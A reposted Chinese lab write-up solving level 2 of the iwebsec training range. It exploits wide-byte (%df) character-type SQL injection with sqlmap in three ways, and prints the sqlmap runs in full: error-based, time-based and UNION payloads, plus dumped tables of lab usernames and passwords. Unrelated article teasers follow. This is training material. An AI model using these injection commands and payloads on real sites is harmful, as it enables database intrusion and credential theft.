iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)

news2025/7/19 12:32:51

系列文章目录

iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客


目录

系列文章目录

前言

第02关 字符型注入

 1.源码分析

2.字符型宽字节注入

(1)渗透方法1:

         (2)渗透方法2:

(3)渗透方法3:

总结


目录

系列文章目录

文章目录

前言

第02关 字符型注入

1.源码分析

2.宽字节注入

(1)渗透方法1:

(3)渗透方法3:

总结



前言

 打开靶场,url为 http://192.168.71.151/sqli/02.php?id=1 如下所示


第02关 字符型注入

1.源码分析

如下所示,存在宽字节注入漏洞且闭合符号为单引号

2.字符型宽字节注入

首先构造sqlmap语句,url地址为 http://192.168.71.151/sqli/02.php?id=1

很明显直接使用如下语句是不会成功的

 sqlmap -u http://192.168.71.151/sqli/02.php?id=1 --current-db --dump --batch

因为这是宽字节注入漏洞,使用默认方法不会渗透成功 

(1)渗透方法1:

将url中的id=1便问id=1%df* ,即将宽字符特征%df加入到参数1后,同时在后面加上*

sqlmap -u http://192.168.71.151/sqli/01.php?id=1%df*  --current-db --dump --batch

 完整交互过程如下所示

[21:46:26] [INFO] URI parameter '#1*' is 'MySQL UNION query (random number) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1260 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://192.168.71.151:80/sqli/01.php?id=1%df AND (SELECT 5388 FROM(SELECT COUNT(*),CONCAT(0x7178707a71,(SELECT (ELT(5388=5388,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://192.168.71.151:80/sqli/01.php?id=1%df AND (SELECT 2061 FROM (SELECT(SLEEP(5)))lOnr)

    Type: UNION query
    Title: MySQL UNION query (random number) - 3 columns
    Payload: http://192.168.71.151:80/sqli/01.php?id=-7105 UNION ALL SELECT CONCAT(0x7178707a71,0x706b715151526771476f687a6e4c71617a504e4e5a644541656d6b4f45757642636c43795276784f,0x7171767a71),9687,9687#
---
[21:46:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:46:26] [INFO] fetching current database
current database: 'iwebsec'
[21:46:26] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:46:26] [INFO] fetching current database
[21:46:26] [INFO] fetching tables for database: 'iwebsec'
[21:46:26] [INFO] retrieved: 'sqli'
[21:46:26] [INFO] retrieved: 'user'
[21:46:27] [INFO] retrieved: 'users'
[21:46:27] [INFO] retrieved: 'xss'
[21:46:27] [INFO] fetching columns for table 'xss' in database 'iwebsec'                                                                                                                                                                  
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'name','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'xss' in database 'iwebsec'                                                                                                                                                                  
[21:46:27] [INFO] retrieved: '7','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '6','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '5','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '1','iwebsec'
[21:46:27] [INFO] retrieved: '8','<?php phpinfo();?>'
Database: iwebsec                                                                                                                                                                                                                         
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 7  | <img src=1 onerror=alert(/ctfs/)/> |
| 6  | <img src=1 onerror=alert(/ctfs/)/> |
| 5  | <img src=1 onerror=alert(/ctfs/)/> |
| 1  | iwebsec                            |
| 8  | <?php phpinfo();?>                 |
+----+------------------------------------+

[21:46:27] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[21:46:27] [INFO] fetching columns for table 'user' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'user' in database 'iwebsec'                                                                                                                                                                 
[21:46:27] [INFO] retrieved: '1','pass1','user1'
[21:46:27] [INFO] retrieved: '2','pass2','user2'
[21:46:27] [INFO] retrieved: '3','pass3','user3'
Database: iwebsec                                                                                                                                                                                                                         
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[21:46:27] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[21:46:27] [INFO] fetching columns for table 'users' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] retrieved: 'role','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'users' in database 'iwebsec'                                                                                                                                                                
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+

[21:46:27] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[21:46:27] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] retrieved: 'email','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'sqli' in database 'iwebsec'                                                                                                                                                                 
[21:46:27] [INFO] retrieved: 'user1@iwebsec.com','1','pass1','user1'
[21:46:27] [INFO] retrieved: 'user2@iwebsec.com','2','pass2','user2'
[21:46:27] [INFO] retrieved: 'user3@iwebsec.com','3','pass3','user3'
[21:46:27] [INFO] retrieved: 'user4@iwebsec.com','4','admin','admin'
[21:46:27] [INFO] retrieved: '123@123.com','5','123','123'
[21:46:27] [INFO] retrieved: '1234@123.com','6','123','ctfs' or updatexml(1,concat(0x7e,(version())),0)#'
[21:46:27] [INFO] retrieved: 'iwebsec02@iwebsec.com','7','123456','iwebsec' or updatexml(1,concat(0x7e,(version())),0)#'
Database: iwebsec                                                                                                                                                                                                                         
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+

[21:46:27] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[21:46:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[21:46:27] [WARNING] your sqlmap version is outdated

[*] ending @ 21:46:27 /2022-11-24/

(2)渗透方法2:

增加宽字符脚本 --tamper unmagicquotes

sqlmap -u http://192.168.71.151/sqli/01.php?id=1 --current-db --dump --batch   --tamper unmagicquotes

完整交互如下所示

kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/01.php?id=1 --current-db --dump --batch   --tamper unmagicquotes
        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[)]_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
|_ -| . [']     | .'| . |                                                                                                                                                                                                                  
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:53:15 /2022-11-24/

[21:53:15] [INFO] loading tamper module 'unmagicquotes'
[21:53:15] [INFO] resuming back-end DBMS 'mysql' 
[21:53:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (2397=2397) THEN 1 ELSE (SELECT 9949 UNION SELECT 5355) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 2678 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(2678=2678,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 3668 FROM (SELECT(SLEEP(5)))vjAy)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71786a6b71,0x456c514d62616f4b7a7651664c6f6b4e72567142766663796152416b674642714e7350626d456542,0x716b7a6271),NULL,NULL-- -
---
[21:53:15] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:53:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[21:53:15] [INFO] fetching current database
current database: 'iwebsec'
[21:53:15] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:53:15] [INFO] fetching current database
[21:53:15] [INFO] fetching tables for database: 'iwebsec'
[21:53:15] [INFO] fetching columns for table 'user' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[21:53:15] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[21:53:15] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+

[21:53:15] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[21:53:15] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 7  | <img src=1 onerror=alert(/ctfs/)/> |
| 6  | <img src=1 onerror=alert(/ctfs/)/> |
| 5  | <img src=1 onerror=alert(/ctfs/)/> |
| 1  | iwebsec                            |
| 8  | <?php phpinfo();?>                 |
+----+------------------------------------+

[21:53:15] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[21:53:15] [INFO] fetching columns for table 'users' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+

[21:53:15] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[21:53:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[21:53:15] [WARNING] your sqlmap version is outdated

[*] ending @ 21:53:15 /2022-11-24/

(3)渗透方法3:

bp抓包,将报文保存为iwebsec02.txt

 修改iwebsec02.txt,将id=1修改为id=1%df'* 如下图所示

注意:根据源码分析这里面的%df是宽字节,'是单引号闭合,*则加在闭合的'后面,告知sqlmap这里为注入点,于是注入语句为

sqlmap -r iwebsec02.txt --current-db --dump --batch 

 如下所示,注入成功

由于sqlmap的完整交互过程前面已有,故而这里并不将完整过程再次列出。


总结

本次渗透的关卡为字符型注入,其实总结来讲本关卡的难度相对而言作为第二关有些难度。

通过源码再来分析下SQL注入重点内容:

(1)闭合方式是什么?iwebsec的第02关关卡为字符型,闭合方式为单引号

(2)注入类别是什么?这部分是宽字节型注入,需要使用%df

(3)是否过滤了关键字?很明显通过源码,iwebsec的字符型关卡无过滤任何信息

了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第2关注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/37146.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Git 分支管理详解

1.前言 我们先来说一个简单的案例吧&#xff0c;你们团队中有多个人再开发一下项目&#xff0c;一同事再开发一个新的功能&#xff0c;需要一周时间完成&#xff0c;他写了其中的30%还没有写完&#xff0c;如果他提 交了这个版本&#xff0c;那么团队中的其它人就不能继续开发…

记录:微星 GE63 屏轴断裂 之后。。。

2022/11/25 记录 微星 GE63 1070 笔记本&#xff0c;使用的第三年&#xff0c;已过保了一年&#xff0c;上周使用时&#xff0c;准备合上笔记本盖。啪一下&#xff0c;左侧屏轴断裂&#xff0c;B面翘起&#xff0c;A面左下角轴盖断了一截。 网上好多人都有类似的情况&#xff…

晶振在单片机中扮演着什么角色?晶振坏了单片机还能运行程序吗?

晶振坏了单片机还能运行程序吗&#xff1f;前言晶振是什么&#xff1f;单片机没有晶振可以运行程序吗&#xff1f;PCB中晶振电路的要求结语前言 今天突然想到一个问题&#xff0c;如果一个单片机的晶振坏了那单片机还能运行程序吗&#xff1f;带着这个问题我查询了很多的治疗发…

HTML5期末考核大作业 基于HTML+CSS+JavaScript沪上美食(9页)

&#x1f380; 精彩专栏推荐&#x1f447;&#x1f3fb;&#x1f447;&#x1f3fb;&#x1f447;&#x1f3fb; ✍️ 作者简介: 一个热爱把逻辑思维转变为代码的技术博主 &#x1f482; 作者主页: 【主页——&#x1f680;获取更多优质源码】 &#x1f393; web前端期末大作业…

我的DW个人网站设计——安徽宣城6页HTML+CSS+JavaScript

家乡旅游景点网页作业制作 网页代码运用了DIV盒子的使用方法&#xff0c;如盒子的嵌套、浮动、margin、border、background等属性的使用&#xff0c;外部大盒子设定居中&#xff0c;内部左中右布局&#xff0c;下方横向浮动排列&#xff0c;大学学习的前端知识点和布局方式都有…

SpringBoot+Mybaits搭建通用管理系统实例十:基础增删改查功能实现下

一、本章内容 实现系统基础增删改查功能,使用抽象类实现基础增删改查功能,包括数据详情加载、列表加载、分页加载、数据删除、批量删除、数据保存、数据更新等功能。 完整课程地址 二、开发视频 SpringBoot+Mybaits搭建通用管理系统实例二:service层实现 三、代码实现 3.1 删…

Flutter高仿微信-第48篇-群聊-图片

Flutter高仿微信系列共59篇&#xff0c;从Flutter客户端、Kotlin客户端、Web服务器、数据库表结构、Xmpp即时通讯服务器、视频通话服务器、腾讯云服务器全面讲解。 详情请查看 效果图&#xff1a; 详情请参考Flutter高仿微信-第44篇-群聊&#xff0c; 这里只是群聊的图片实现代…

NeRF~

NeRF实在太重要了代表着计算机视觉、图像学结合的未来重要方向&#xff1b;NeRF对于计算机视觉背景的同学有一定的理解门槛&#xff0c;本次试图以最小背景知识补充、最少理解成本为前提介绍NeRF。 NeRF&#xff0c;即Neural Radiance Fields&#xff08;神经辐射场&#xff0…

【语音识别】动态时间规整算法(RTW)语音识别系统【含GUI Matlab源码 341期】

⛄一、动态时间规整算法&#xff08;RTW&#xff09;语音识别 软件算法主要分为语音信号滤波去噪、预加重、分帧、端点检测、特征参数提取、模式匹配。算法的关键点和难点是特征参数提取和模式匹配。孤立词的语音识别应用程序也是基于MATLAB的GUI进行开发。 1 语音预处理 语音…

C++11标准模板(STL)- 算法(std::lower_bound)

定义于头文件 <algorithm> 算法库提供大量用途的函数&#xff08;例如查找、排序、计数、操作&#xff09;&#xff0c;它们在元素范围上操作。注意范围定义为 [first, last) &#xff0c;其中 last 指代要查询或修改的最后元素的后一个元素。 返回指向第一个不小于给定…

Hystrix原理

背景 分布式系统环境下&#xff0c;服务间类似依赖非常常见&#xff0c;一个业务调用通常依赖多个基础服务。如下图&#xff0c;对于同步调用&#xff0c;当库存服务不可用时&#xff0c;商品服务请求线程被阻塞&#xff0c;当有大批量请求调用库存服务时&#xff0c;最终可能…

jupyter中安装scala和spark内核详细教程

jupyter中安装scala和spark内核 jupyter中安装scala和spark内核 文章目录jupyter中安装scala和spark内核一、前期准备二、安装&#xff08;一&#xff09;Anaconda1、文件上传到Linux系统上方法一&#xff1a;方法二&#xff1a;使用wget2、安装Anaconda3、激活环境4、jupyter…

一文剖析Linux内核中内存管理

Linux中内存管理 内存管理的主要工作就是对物理内存进行组织&#xff0c;然后对物理内存的分配和回收。但是Linux引入了虚拟地址的概念。 文章推荐&#xff1a; 关于如何快速学好&#xff0c;学懂Linux内核。内含学习路线 需要多久才能看完linux内核源码&#xff1f; ​​…

windows位图绘制(显示位图资源)LoadBitmap、CreateCompatibleDC、BitBlt、StretchBlt

位图绘制 位图相关 光栅图形-记录图像中每一点的颜色等信息。 矢量图形-记录图像算法、绘图指令等。 HBITMAP-位图句柄 位图的适用 1.在资源中添加位图资源&#xff08;在vs中点鼠标增加&#xff09; 2.在资源中加载位图LoadBitmap 3.创建一个与当前DC相匹配的DC&#xff08;内…

Js逆向教程-13浏览器和JS的关系/伪造浏览器环境 )

作者&#xff1a;虚坏叔叔 博客&#xff1a;https://xuhss.com 早餐店不会开到晚上&#xff0c;想吃的人早就来了&#xff01;&#x1f604; Js逆向教程-13浏览器和JS的关系/伪造浏览器环境 ) 一、浏览器必然包含几个部分&#xff1a; 显示区域、输入网址、刷新按钮DOMBOM运行…

计算机网络笔记【面试】

计算机网络笔记【面试】前言推荐计算机网络笔记二、基础篇三、HTTP篇四、TCP 篇4.1 TCP 三次握手与四次挥手面试题什么是 TCP &#xff1f;UDP 和 TCP 有什么区别呢&#xff1f;分别的应用场景是&#xff1f;TCP 连接建立TCP 三次握手过程是怎样的&#xff1f;为什么是三次握手…

Aspose.Slides 21.11.0 For .NET Crack

适用于 .NET 的 Aspose.Slides 用于 PowerPoint 文件格式的 .NET API 在 .NET C# 中读取、写入、修改、合并、克隆、保护和转换 PowerPoint 和 OpenOffice 演示文稿&#xff0c;无需任何外部软件。 Aspose.Slides for .NET 是一个用于 PowerPoint 和 OpenOffice 格式的演示文稿…

Linux Mint 的更新管理器现在支持 Flatpak

导读Linux Mint 的更新管理器变得更有用了&#xff01; Linux Mint 的更新管理器是该发行版的一个重要组成部分&#xff0c;它使新用户可以获得更为方便简易的体验。 最近的一次更新 Linux Mint 21 推出了许多改进&#xff0c;包括更新管理器对 Flatpak 的支持。 你只需要更新…

【每周CV论文推荐】初学模型蒸馏值得阅读的文章

欢迎来到《每周CV论文推荐》。在这个专栏里&#xff0c;还是本着有三AI一贯的原则&#xff0c;专注于让大家能够系统性完成学习&#xff0c;所以我们推荐的文章也必定是同一主题的。模型蒸馏是非常重要的模型压缩方法&#xff0c;在学术界研究非常广泛&#xff0c;本次我们来简…

HTML5期末考核大作业网站——卫生与健康HTML+CSS+JavaScript

&#x1f380; 精彩专栏推荐&#x1f447;&#x1f3fb;&#x1f447;&#x1f3fb;&#x1f447;&#x1f3fb; ✍️ 作者简介: 一个热爱把逻辑思维转变为代码的技术博主 &#x1f482; 作者主页: 【主页——&#x1f680;获取更多优质源码】 &#x1f393; web前端期末大作业…